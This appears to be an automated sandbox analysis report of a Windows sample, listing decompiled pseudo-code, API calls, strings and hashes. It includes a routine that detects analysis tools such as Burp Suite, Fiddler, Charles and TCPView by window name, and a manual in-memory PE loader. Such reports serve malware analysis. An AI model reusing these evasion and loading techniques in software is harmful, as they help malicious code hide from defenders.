                                                                                                                                                      						}
                                                                                                                                                      						_t172 = _t164[2];
                                                                                                                                                      						_t166 = _t164 - 8;
                                                                                                                                                      						 *_t166 = _t164[2];
                                                                                                                                                      						_push("%0.1f %%");
                                                                                                                                                      						_push(_t166 + 0x44);
                                                                                                                                                      						E004036D0(_t126, _t166 + 0x44);
                                                                                                                                                      						_t164 = _t166 + 0x10;
                                                                                                                                                      						asm("repne scasb");
                                                                                                                                                      						DrawTextA(_t162,  &(_t164[9]),  !(_t127 | 0xffffffff) - 1,  &(_t164[3]), 0x25);
                                                                                                                                                      						_t115 = _t164[3] + 0x11;
                                                                                                                                                      						_t127 = _t164[2] + 4;
                                                                                                                                                      						_t164[3] = _t115;
                                                                                                                                                      						_t164[4] = _t115 + 0x11;
                                                                                                                                                      						_t118 = _t164[5] - 1;
                                                                                                                                                      						_t164[2] = _t127;
                                                                                                                                                      						_t164[5] = _t118;
                                                                                                                                                      					} while (_t118 != 0);
                                                                                                                                                      				}
                                                                                                                                                      				SelectObject(_t162, _t164[5]);
                                                                                                                                                      				SelectObject(_t162, _t164[7]);
                                                                                                                                                      				return SelectObject(_t162, _t164[6]);
                                                                                                                                                      			}


                                                                                                                                                      APIs
                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 004013B3
                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 004013BE
                                                                                                                                                      • GetStockObject.GDI32(00000008), ref: 004013CA
                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 004013D2
                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004013DB
                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 004013E4
                                                                                                                                                      • __ftol.LIBCMT ref: 00401439
                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00401449
                                                                                                                                                      • Rectangle.GDI32(?,00000019,000000AF,00000001,?), ref: 00401460
                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00401473
                                                                                                                                                      • Rectangle.GDI32(?,00000000,?,000000B0,?), ref: 0040148D
                                                                                                                                                      • DrawTextA.USER32(?,?,?,?,00000025), ref: 004014CB
                                                                                                                                                      • __ftol.LIBCMT ref: 0040154D
                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00401574
                                                                                                                                                      • Rectangle.GDI32(?,00000019,000000AF,00000001,?), ref: 0040158B
                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 0040159E
                                                                                                                                                      • Rectangle.GDI32(?,00000000,?,000000B0,?), ref: 004015B8
                                                                                                                                                      • DrawTextA.USER32(?,?,0062641F,00000019,00000025), ref: 0040161C
                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00401654
                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 0040165C
                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00401664
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Object$Select$Rectangle$Text$Draw__ftol$ColorModeStock
                                                                                                                                                      • String ID: %0.1f %%$%0.1f db$-inf db
                                                                                                                                                      • API String ID: 1744867341-3832817206
                                                                                                                                                      • Opcode ID: 520a7b3b37642a0fdd8d1bba43b2d9cb07e742f30a0f0afb5f0929533602d730
                                                                                                                                                      • Instruction ID: a77257ee316fdba333d06e361e7088ec18a0b998c7069467a8efb2542bb6b01f
                                                                                                                                                      • Opcode Fuzzy Hash: 520a7b3b37642a0fdd8d1bba43b2d9cb07e742f30a0f0afb5f0929533602d730
                                                                                                                                                      • Instruction Fuzzy Hash: 2F813AB1508701AFD300DF15DD8596FB7E9FBC8304F404A2DF595A72A0DB78E9058B9A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                      			E100133E0(void* __ebx) {
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				_Unknown_base(*)()* _t7;
                                                                                                                                                      				long _t10;
                                                                                                                                                      				void* _t11;
                                                                                                                                                      				int _t12;
                                                                                                                                                      				void* _t18;
                                                                                                                                                      				intOrPtr _t21;
                                                                                                                                                      				long _t26;
                                                                                                                                                      				void* _t30;
                                                                                                                                                      				struct HINSTANCE__* _t37;
                                                                                                                                                      				void* _t40;
                                                                                                                                                      				void* _t42;
                                                                                                                                                      
                                                                                                                                                      				_t30 = __ebx;
                                                                                                                                                      				_t37 = GetModuleHandleA("KERNEL32.DLL");
                                                                                                                                                      				if(_t37 != 0) {
                                                                                                                                                      					 *0x10333818 = GetProcAddress(_t37, "FlsAlloc");
                                                                                                                                                      					 *0x1033381c = GetProcAddress(_t37, "FlsGetValue");
                                                                                                                                                      					 *0x10333820 = GetProcAddress(_t37, "FlsSetValue");
                                                                                                                                                      					_t7 = GetProcAddress(_t37, "FlsFree");
                                                                                                                                                      					__eflags =  *0x10333818;
                                                                                                                                                      					_t40 = TlsSetValue;
                                                                                                                                                      					 *0x10333824 = _t7;
                                                                                                                                                      					if( *0x10333818 == 0) {
                                                                                                                                                      						L6:
                                                                                                                                                      						 *0x1033381c = TlsGetValue;
                                                                                                                                                      						 *0x10333818 = E10013097;
                                                                                                                                                      						 *0x10333820 = _t40;
                                                                                                                                                      						 *0x10333824 = TlsFree;
                                                                                                                                                      					} else {
                                                                                                                                                      						__eflags =  *0x1033381c;
                                                                                                                                                      						if( *0x1033381c == 0) {
                                                                                                                                                      							goto L6;
                                                                                                                                                      						} else {
                                                                                                                                                      							__eflags =  *0x10333820;
                                                                                                                                                      							if( *0x10333820 == 0) {
                                                                                                                                                      								goto L6;
                                                                                                                                                      							} else {
                                                                                                                                                      								__eflags = _t7;
                                                                                                                                                      								if(_t7 == 0) {
                                                                                                                                                      									goto L6;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					_t10 = TlsAlloc();
                                                                                                                                                      					__eflags = _t10 - 0xffffffff;
                                                                                                                                                      					 *0x10332c6c = _t10;
                                                                                                                                                      					if(_t10 == 0xffffffff) {
                                                                                                                                                      						L15:
                                                                                                                                                      						_t11 = 0;
                                                                                                                                                      						__eflags = 0;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t12 = TlsSetValue(_t10,  *0x1033381c);
                                                                                                                                                      						__eflags = _t12;
                                                                                                                                                      						if(_t12 == 0) {
                                                                                                                                                      							goto L15;
                                                                                                                                                      						} else {
                                                                                                                                                      							E100117FA();
                                                                                                                                                      							 *0x10333818 = E10012FC8( *0x10333818);
                                                                                                                                                      							 *0x1033381c = E10012FC8( *0x1033381c);
                                                                                                                                                      							 *0x10333820 = E10012FC8( *0x10333820);
                                                                                                                                                      							 *0x10333824 = E10012FC8( *0x10333824);
                                                                                                                                                      							_t18 = E1000F88D();
                                                                                                                                                      							__eflags = _t18;
                                                                                                                                                      							if(_t18 == 0) {
                                                                                                                                                      								L14:
                                                                                                                                                      								E100130CA();
                                                                                                                                                      								goto L15;
                                                                                                                                                      							} else {
                                                                                                                                                      								_push(L10013256);
                                                                                                                                                      								_t21 =  *((intOrPtr*)(E10013034( *0x10333818)))();
                                                                                                                                                      								__eflags = _t21 - 0xffffffff;
                                                                                                                                                      								 *0x10332c68 = _t21;
                                                                                                                                                      								if(_t21 == 0xffffffff) {
                                                                                                                                                      									goto L14;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t42 = E100148B1(1, 0x214);
                                                                                                                                                      									__eflags = _t42;
                                                                                                                                                      									if(_t42 == 0) {
                                                                                                                                                      										goto L14;
                                                                                                                                                      									} else {
                                                                                                                                                      										_push(_t42);
                                                                                                                                                      										_push( *0x10332c68);
                                                                                                                                                      										__eflags =  *((intOrPtr*)(E10013034( *0x10333820)))();
                                                                                                                                                      										if(__eflags == 0) {
                                                                                                                                                      											goto L14;
                                                                                                                                                      										} else {
                                                                                                                                                      											_push(0);
                                                                                                                                                      											_push(_t42);
                                                                                                                                                      											E10013107(_t30, _t37, _t42, __eflags);
                                                                                                                                                      											_t26 = GetCurrentThreadId();
                                                                                                                                                      											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                                                                                                                      											 *_t42 = _t26;
                                                                                                                                                      											_t11 = 1;
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					return _t11;
                                                                                                                                                      				} else {
                                                                                                                                                      					E100130CA();
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      			}

















                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,1000E9BD), ref: 100133E6
                                                                                                                                                      • __mtterm.LIBCMT ref: 100133F2
                                                                                                                                                        • Part of subcall function 100130CA: __decode_pointer.LIBCMT ref: 100130DB
                                                                                                                                                        • Part of subcall function 100130CA: TlsFree.KERNEL32(0000001D,1001355F), ref: 100130F5
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 10013408
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10013415
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10013422
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1001342F
                                                                                                                                                      • TlsAlloc.KERNEL32 ref: 1001347F
                                                                                                                                                      • TlsSetValue.KERNEL32(00000000), ref: 1001349A
                                                                                                                                                      • __init_pointers.LIBCMT ref: 100134A4
                                                                                                                                                      • __encode_pointer.LIBCMT ref: 100134AF
                                                                                                                                                      • __encode_pointer.LIBCMT ref: 100134BF
                                                                                                                                                      • __encode_pointer.LIBCMT ref: 100134CF
                                                                                                                                                      • __encode_pointer.LIBCMT ref: 100134DF
                                                                                                                                                      • __decode_pointer.LIBCMT ref: 10013500
                                                                                                                                                      • __calloc_crt.LIBCMT ref: 10013519
                                                                                                                                                      • __decode_pointer.LIBCMT ref: 10013533
                                                                                                                                                      • __initptd.LIBCMT ref: 10013542
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 10013549
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E100193D0(void* __ebx, void* __edi, void* __eflags, struct HWND__* _a4) {
                                                                                                                                                      				char _v267;
                                                                                                                                                      				char _v268;
                                                                                                                                                      				char _v531;
                                                                                                                                                      				char _v532;
                                                                                                                                                      				void* _t35;
                                                                                                                                                      				void* _t37;
                                                                                                                                                      				void* _t38;
                                                                                                                                                      				void* _t39;
                                                                                                                                                      				void* _t41;
                                                                                                                                                      				void* _t42;
                                                                                                                                                      				void* _t43;
                                                                                                                                                      				void* _t45;
                                                                                                                                                      				void* _t46;
                                                                                                                                                      				void* _t48;
                                                                                                                                                      				void* _t51;
                                                                                                                                                      				void* _t53;
                                                                                                                                                      				void* _t55;
                                                                                                                                                      				void* _t57;
                                                                                                                                                      				void* _t61;
                                                                                                                                                      				void* _t66;
                                                                                                                                                      				void* _t88;
                                                                                                                                                      				void* _t91;
                                                                                                                                                      				void* _t92;
                                                                                                                                                      				void* _t93;
                                                                                                                                                      				void* _t94;
                                                                                                                                                      				void* _t95;
                                                                                                                                                      				void* _t96;
                                                                                                                                                      				void* _t97;
                                                                                                                                                      				void* _t98;
                                                                                                                                                      				void* _t99;
                                                                                                                                                      				void* _t100;
                                                                                                                                                      
                                                                                                                                                      				_t87 = __edi;
                                                                                                                                                      				_t70 = __ebx;
                                                                                                                                                      				_v532 = 0;
                                                                                                                                                      				E1000CF20(__edi,  &_v531, 0, 0x103);
                                                                                                                                                      				_v268 = 0;
                                                                                                                                                      				E1000CF20(_t87,  &_v267, 0, 0x103);
                                                                                                                                                      				GetClassNameA(_a4,  &_v532, 0x104);
                                                                                                                                                      				GetWindowTextA(_a4,  &_v268, 0x104);
                                                                                                                                                      				_t35 = E1000CAC0( &_v532);
                                                                                                                                                      				_t91 = _t88 + 0x1c;
                                                                                                                                                      				_t108 = _t35;
                                                                                                                                                      				if(_t35 <= 0) {
                                                                                                                                                      					L30:
                                                                                                                                                      					return 1;
                                                                                                                                                      				}
                                                                                                                                                      				_t37 = E10019330(__ebx, _t87, _t108,  &_v532, "Afx:400000:8:10003:0:");
                                                                                                                                                      				_t92 = _t91 + 8;
                                                                                                                                                      				if(_t37 == 0) {
                                                                                                                                                      					_t38 = E10019330(__ebx, _t87, __eflags,  &_v532, "TCPViewClass");
                                                                                                                                                      					_t93 = _t92 + 8;
                                                                                                                                                      					__eflags = _t38;
                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                      						_t39 = E10019330(__ebx, _t87, __eflags,  &_v532, "TStdHttpAnalyzerForm");
                                                                                                                                                      						_t94 = _t93 + 8;
                                                                                                                                                      						__eflags = _t39;
                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                      							_t41 = E10019330(_t70, _t87, __eflags,  &_v532, "gdkWindowToplevel");
                                                                                                                                                      							_t95 = _t94 + 8;
                                                                                                                                                      							__eflags = _t41;
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								_t42 = E10019330(_t70, _t87, __eflags,  &_v532, "XTPMainFrame");
                                                                                                                                                      								_t96 = _t95 + 8;
                                                                                                                                                      								__eflags = _t42;
                                                                                                                                                      								if(_t42 == 0) {
                                                                                                                                                      									_t43 = E1000CAC0( &_v268);
                                                                                                                                                      									_t97 = _t96 + 4;
                                                                                                                                                      									__eflags = _t43;
                                                                                                                                                      									if(__eflags <= 0) {
                                                                                                                                                      										L20:
                                                                                                                                                      										_t45 = E1000CAC0( &_v268);
                                                                                                                                                      										_t98 = _t97 + 4;
                                                                                                                                                      										__eflags = _t45;
                                                                                                                                                      										if(__eflags <= 0) {
                                                                                                                                                      											L23:
                                                                                                                                                      											_t46 = E10019330(_t70, _t87, __eflags,  &_v532, "SunAwtFrame");
                                                                                                                                                      											_t99 = _t98 + 8;
                                                                                                                                                      											__eflags = _t46;
                                                                                                                                                      											if(_t46 == 0) {
                                                                                                                                                      												goto L30;
                                                                                                                                                      											}
                                                                                                                                                      											_t48 = E1000CAC0( &_v268);
                                                                                                                                                      											_t100 = _t99 + 4;
                                                                                                                                                      											__eflags = _t48;
                                                                                                                                                      											if(__eflags <= 0) {
                                                                                                                                                      												L27:
                                                                                                                                                      												__eflags = E1000CAC0( &_v268);
                                                                                                                                                      												if(__eflags <= 0) {
                                                                                                                                                      													goto L30;
                                                                                                                                                      												}
                                                                                                                                                      												_t51 = E10019330(_t70, _t87, __eflags,  &_v268, "Burp Suite");
                                                                                                                                                      												__eflags = _t51;
                                                                                                                                                      												if(_t51 == 0) {
                                                                                                                                                      													goto L30;
                                                                                                                                                      												}
                                                                                                                                                      												 *0x10333dcc = 1;
                                                                                                                                                      												return 0;
                                                                                                                                                      											}
                                                                                                                                                      											_t53 = E10019330(_t70, _t87, __eflags,  &_v268, "Charles");
                                                                                                                                                      											_t100 = _t100 + 8;
                                                                                                                                                      											__eflags = _t53;
                                                                                                                                                      											if(_t53 == 0) {
                                                                                                                                                      												goto L27;
                                                                                                                                                      											}
                                                                                                                                                      											 *0x10333dcc = 1;
                                                                                                                                                      											return 0;
                                                                                                                                                      										}
                                                                                                                                                      										_t55 = E10019330(_t70, _t87, __eflags,  &_v268, "ASExplorer");
                                                                                                                                                      										_t98 = _t98 + 8;
                                                                                                                                                      										__eflags = _t55;
                                                                                                                                                      										if(__eflags == 0) {
                                                                                                                                                      											goto L23;
                                                                                                                                                      										}
                                                                                                                                                      										 *0x10333dcc = 1;
                                                                                                                                                      										return 0;
                                                                                                                                                      									}
                                                                                                                                                      									_t57 = E10019330(_t70, _t87, __eflags,  &_v268, "Telerik Fiddler");
                                                                                                                                                      									_t97 = _t97 + 8;
                                                                                                                                                      									__eflags = _t57;
                                                                                                                                                      									if(_t57 == 0) {
                                                                                                                                                      										goto L20;
                                                                                                                                                      									}
                                                                                                                                                      									 *0x10333dcc = 1;
                                                                                                                                                      									return 0;
                                                                                                                                                      								}
                                                                                                                                                      								__eflags = E1000CAC0( &_v268);
                                                                                                                                                      								if(__eflags <= 0) {
                                                                                                                                                      									L16:
                                                                                                                                                      									goto L30;
                                                                                                                                                      								}
                                                                                                                                                      								_t61 = E10019330(_t70, _t87, __eflags,  &_v268, "HTTP Debugger");
                                                                                                                                                      								__eflags = _t61;
                                                                                                                                                      								if(_t61 == 0) {
                                                                                                                                                      									goto L16;
                                                                                                                                                      								}
                                                                                                                                                      								 *0x10333dcc = 1;
                                                                                                                                                      								return 0;
                                                                                                                                                      							}
                                                                                                                                                      							 *0x10333dcc = 1;
                                                                                                                                                      							return 0;
                                                                                                                                                      						}
                                                                                                                                                      						 *0x10333dcc = 1;
                                                                                                                                                      						return 0;
                                                                                                                                                      					}
                                                                                                                                                      					 *0x10333dcc = 1;
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				_t66 = E1000CAC0( &_v268);
                                                                                                                                                      				_t110 = _t66;
                                                                                                                                                      				if(_t66 <= 0 || E10019330(__ebx, _t87, _t110,  &_v268, "WPE") == 0) {
                                                                                                                                                      					goto L30;
                                                                                                                                                      				} else {
                                                                                                                                                      					 *0x10333dcc = 1;
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      			}

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 100193EE
                                                                                                                                                      • _memset.LIBCMT ref: 1001940B
                                                                                                                                                      • GetClassNameA.USER32(?,00000000,00000104), ref: 10019423
                                                                                                                                                      • GetWindowTextA.USER32 ref: 10019439
                                                                                                                                                      • _strlen.LIBCMT ref: 10019446
                                                                                                                                                        • Part of subcall function 10019330: _strlen.LIBCMT ref: 1001933B
                                                                                                                                                        • Part of subcall function 10019330: _strlen.LIBCMT ref: 10019349
                                                                                                                                                      • _strlen.LIBCMT ref: 10019475
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen$_memset$ClassNameTextWindow
                                                                                                                                                      • String ID: ASExplorer$Afx:400000:8:10003:0:$Burp Suite$Charles$HTTP Debugger$SunAwtFrame$TCPViewClass$TStdHttpAnalyzerForm$Telerik Fiddler$WPE$XTPMainFrame$gdkWindowToplevel
                                                                                                                                                      • API String ID: 1565133231-1140939848
                                                                                                                                                      • Opcode ID: 5a0ce18abdde982357f7fdf8f1a79584a6c51237df7161ac394efa5431355cbd
                                                                                                                                                      • Instruction ID: a5f97e290b41472754b7e9ce8727d5d20b8c63e5840e42e0df40fd03ad5c4008
                                                                                                                                                      • Opcode Fuzzy Hash: 5a0ce18abdde982357f7fdf8f1a79584a6c51237df7161ac394efa5431355cbd
                                                                                                                                                      • Instruction Fuzzy Hash: 1C51B7B995020956EB50C770AC85FDA72BCEB20348F444464AA099B142FBB5F7C8CF71
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • VBCABLE not installed, xrefs: 00402EDD
                                                                                                                                                      • The VB-Audio Virtual Cable named"%s"is not installed..., xrefs: 00402EC6
                                                                                                                                                      • VBCABLE Driver version not compatibleVersion 1.0.2.7 or higher required..., xrefs: 00402E9F
                                                                                                                                                      • VB-Audio Virtual Cable, xrefs: 00402EBD
                                                                                                                                                      • VBCABLE Control Error, xrefs: 00402E9A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessagePaint$BeginKillPostProcQuitTimerWindow
                                                                                                                                                      • String ID: The VB-Audio Virtual Cable named"%s"is not installed...$VB-Audio Virtual Cable$VBCABLE Control Error$VBCABLE Driver version not compatibleVersion 1.0.2.7 or higher required...$VBCABLE not installed
                                                                                                                                                      • API String ID: 3845133221-3942928297
                                                                                                                                                      • Opcode ID: 4d63a2bfa6327ec0f3004e0c0bf44bc91a48c0d1608c2a1f2f97a1fbe294faf2
                                                                                                                                                      • Instruction ID: bb4cc1059bb1b6754256c31f6ab098d666290e2db6be54662162045ecf1f366d
                                                                                                                                                      • Opcode Fuzzy Hash: 4d63a2bfa6327ec0f3004e0c0bf44bc91a48c0d1608c2a1f2f97a1fbe294faf2
                                                                                                                                                      • Instruction Fuzzy Hash: 7A711DB26052006FD320DB58EC56FEB3758EBC5314F04443AF688A71C2E7B9A56586EF
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 73%
                                                                                                                                                      			E1001B620(void* __ebx, void* __edi, void* __esi, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				signed short* _v16;
                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                      				_Unknown_base(*)()* _v28;
                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                      				signed int _v36;
                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                      				char _v72;
                                                                                                                                                      				void* _v76;
                                                                                                                                                      				intOrPtr _v80;
                                                                                                                                                      				intOrPtr* _v84;
                                                                                                                                                      				intOrPtr _v88;
                                                                                                                                                      				intOrPtr _v92;
                                                                                                                                                      				intOrPtr _v96;
                                                                                                                                                      				intOrPtr _v100;
                                                                                                                                                      				void* _t170;
                                                                                                                                                      				void* _t173;
                                                                                                                                                      				void* _t182;
                                                                                                                                                      				intOrPtr _t184;
                                                                                                                                                      				void* _t194;
                                                                                                                                                      				void* _t203;
                                                                                                                                                      				void* _t206;
                                                                                                                                                      				void* _t207;
                                                                                                                                                      				void* _t209;
                                                                                                                                                      				intOrPtr _t220;
                                                                                                                                                      				intOrPtr _t225;
                                                                                                                                                      				void* _t239;
                                                                                                                                                      				intOrPtr _t311;
                                                                                                                                                      				void* _t326;
                                                                                                                                                      				void* _t327;
                                                                                                                                                      				void* _t328;
                                                                                                                                                      				void* _t329;
                                                                                                                                                      				void* _t330;
                                                                                                                                                      				void* _t332;
                                                                                                                                                      				void* _t333;
                                                                                                                                                      				void* _t334;
                                                                                                                                                      				void* _t337;
                                                                                                                                                      				void* _t338;
                                                                                                                                                      				void* _t339;
                                                                                                                                                      
                                                                                                                                                      				_t327 = __esi;
                                                                                                                                                      				_t326 = __edi;
                                                                                                                                                      				_t239 = __ebx;
                                                                                                                                                      				_v76 = 0;
                                                                                                                                                      				_v20 = 0;
                                                                                                                                                      				_v28 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetNativeSystemInfo");
                                                                                                                                                      				_t170 = E1001AE40(_a8, 0x40);
                                                                                                                                                      				_t329 = _t328 + 8;
                                                                                                                                                      				if(_t170 != 0) {
                                                                                                                                                      					_v16 = _a4;
                                                                                                                                                      					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
                                                                                                                                                      						_t9 =  &(_v16[0x1e]); // 0xc707ebe8
                                                                                                                                                      						_t173 = E1001AE40(_a8,  *_t9 + 0xf8);
                                                                                                                                                      						_t330 = _t329 + 8;
                                                                                                                                                      						if(_t173 != 0) {
                                                                                                                                                      							_t13 =  &(_v16[0x1e]); // 0xc707ebe8
                                                                                                                                                      							_v84 = _a4 +  *_t13;
                                                                                                                                                      							if( *_v84 == 0x4550) {
                                                                                                                                                      								if(( *(_v84 + 4) & 0x0000ffff) == 0x14c) {
                                                                                                                                                      									if(( *(_v84 + 0x38) & 0x00000001) == 0) {
                                                                                                                                                      										_v88 = _v84 + ( *(_v84 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                      										_v36 =  *(_v84 + 0x38);
                                                                                                                                                      										_v12 = 0;
                                                                                                                                                      										while(_v12 < ( *(_v84 + 6) & 0x0000ffff)) {
                                                                                                                                                      											if( *((intOrPtr*)(_v88 + 0x10)) != 0) {
                                                                                                                                                      												_v92 =  *((intOrPtr*)(_v88 + 0xc)) +  *((intOrPtr*)(_v88 + 0x10));
                                                                                                                                                      											} else {
                                                                                                                                                      												_v92 =  *((intOrPtr*)(_v88 + 0xc)) + _v36;
                                                                                                                                                      											}
                                                                                                                                                      											if(_v92 > _v20) {
                                                                                                                                                      												_v20 = _v92;
                                                                                                                                                      											}
                                                                                                                                                      											_v12 = _v12 + 1;
                                                                                                                                                      											_v88 = _v88 + 0x28;
                                                                                                                                                      										}
                                                                                                                                                      										_v28( &_v72);
                                                                                                                                                      										_v32 = E1001AE80( *((intOrPtr*)(_v84 + 0x50)), _v68);
                                                                                                                                                      										_t182 = E1001AE80(_v20, _v68);
                                                                                                                                                      										_t332 = _t330 + 0x10;
                                                                                                                                                      										if(_v32 == _t182) {
                                                                                                                                                      											_t184 = _a12( *((intOrPtr*)(_v84 + 0x34)), _v32, 0x3000, 4, _a32);
                                                                                                                                                      											_t333 = _t332 + 0x14;
                                                                                                                                                      											_v24 = _t184;
                                                                                                                                                      											if(_v24 != 0) {
                                                                                                                                                      												L26:
                                                                                                                                                      												_v76 = HeapAlloc(GetProcessHeap(), 8, 0x40);
                                                                                                                                                      												if(_v76 != 0) {
                                                                                                                                                      													 *((intOrPtr*)(_v76 + 4)) = _v24;
                                                                                                                                                      													asm("sbb ecx, ecx");
                                                                                                                                                      													 *(_v76 + 0x14) =  ~( ~( *(_v84 + 0x16) & 0x2000));
                                                                                                                                                      													 *((intOrPtr*)(_v76 + 0x1c)) = _a12;
                                                                                                                                                      													 *((intOrPtr*)(_v76 + 0x20)) = _a16;
                                                                                                                                                      													 *((intOrPtr*)(_v76 + 0x24)) = _a20;
                                                                                                                                                      													 *((intOrPtr*)(_v76 + 0x28)) = _a24;
                                                                                                                                                      													 *((intOrPtr*)(_v76 + 0x2c)) = _a28;
                                                                                                                                                      													 *((intOrPtr*)(_v76 + 0x34)) = _a32;
                                                                                                                                                      													 *((intOrPtr*)(_v76 + 0x3c)) = _v68;
                                                                                                                                                      													_t194 = E1001AE40(_a8,  *((intOrPtr*)(_v84 + 0x54)));
                                                                                                                                                      													_t334 = _t333 + 8;
                                                                                                                                                      													if(_t194 != 0) {
                                                                                                                                                      														_v8 = _a12(_v24,  *((intOrPtr*)(_v84 + 0x54)), 0x1000, 4, _a32);
                                                                                                                                                      														E1000D190(_t239, _t326, _t327, _v8, _v16,  *((intOrPtr*)(_v84 + 0x54)));
